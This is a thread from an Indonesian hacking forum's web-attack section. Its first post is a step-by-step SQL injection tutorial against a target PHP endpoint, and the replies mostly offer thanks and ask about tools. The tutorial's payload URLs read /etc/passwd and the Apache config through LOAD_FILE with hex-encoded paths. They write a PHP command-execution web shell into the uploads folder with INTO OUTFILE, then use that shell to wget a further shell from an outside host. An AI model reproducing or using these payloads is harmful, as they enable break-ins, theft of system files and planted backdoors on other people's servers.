[Share] SQL Injection Load File

Share SQL Injection Load File - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html)
+--- Thread: Share SQL Injection Load File (/thread-5845.html)

Pages: 1 2

SQL Injection Load File - wine trochanter - 06-01-2014

Assalamualaikum
numpang spam yee
langsung saja,
keuntungannya disini gak perlu page admin buat upload backdoor nya

target
https://www.target.com/ajax_city_all_branch.php?state=PANAJI

kasih tanda petik
https://www.target.com/ajax_city_all_branch.php?state=PANAJI'

Spoiler! :

error sqli, gunakan perintah order by 2--

Spoiler! :

sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' order by 1--+
sudah tidak error Tongue

Spoiler! :

sekarang gunakan https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select 1--+

Spoiler! :

liat user nya
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select user()--+

Spoiler! :

nahh root
syarat melakukan ini ada 2

For creating any file on the website with SQL queries two things are most important

Smile

1) Root Path ( We have it by ERROR Smile

2) File Privilages for the Current MySQl User Big Grin

we have File Privilages as well Big Grin

artiin sendiri yah Smile

)

selanjutnya
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah

Spoiler! :

nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya Big Grin

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+

Spoiler! :

sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt

"wine ganteng" nya di ubah ke hex yah Big Grin

Spoiler! :

Coba sekarang kita masukan ini buat mendonwload bekdor Tongue

"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -

Spoiler! :

Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php

terus buka dah

Spoiler! :

sekian dan terima kasih Big Grin

gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*

RE: SQL Injection Load File - iyan squid - 06-01-2014

jossss (y)

RE: SQL Injection Load File - Airsky27 - 06-01-2014

Ijin Di Plajari Dulu Om.. masih rada bingung.. Undecided

RE: SQL Injection Load File - G_26 - 06-02-2014

Kereeen..Kereeeen Om Wine Ditunggu Tutor Yang Selanjutnya Big Grin

RE: SQL Injection Load File - orang sederhana - 06-02-2014

pak dokter @wine_trochanter itu yang di mozilla nya pake apaan ? di bawah tempat URL Big Grin

RE: SQL Injection Load File - wine trochanter - 06-02-2014

(06-02-2014, 09:39 AM)orang sederhana Wrote: pak dokter @wine_trochanter itu yang di mozilla nya pake apaan ? di bawah tempat URL

hackbar nama nya pak

RE: SQL Injection Load File - orang sederhana - 06-02-2014

itu addon mozilla pak @winetrochanter ?

RE: SQL Injection Load File - wine trochanter - 06-02-2014

(06-02-2014, 03:00 PM)orang sederhana Wrote: itu addon mozilla pak @winetrochanter ?

iyuuppss bener

RE: SQL Injection Load File - RobotBernyawa - 06-18-2014

Thanks udah sharing ilmunya
ijijn nyoba bang Big Grin

RE: SQL Injection Load File - Hankz - 01-30-2015

ngga ketemu pathnya bro,harus gimana lagi yaa cari pathnya bro?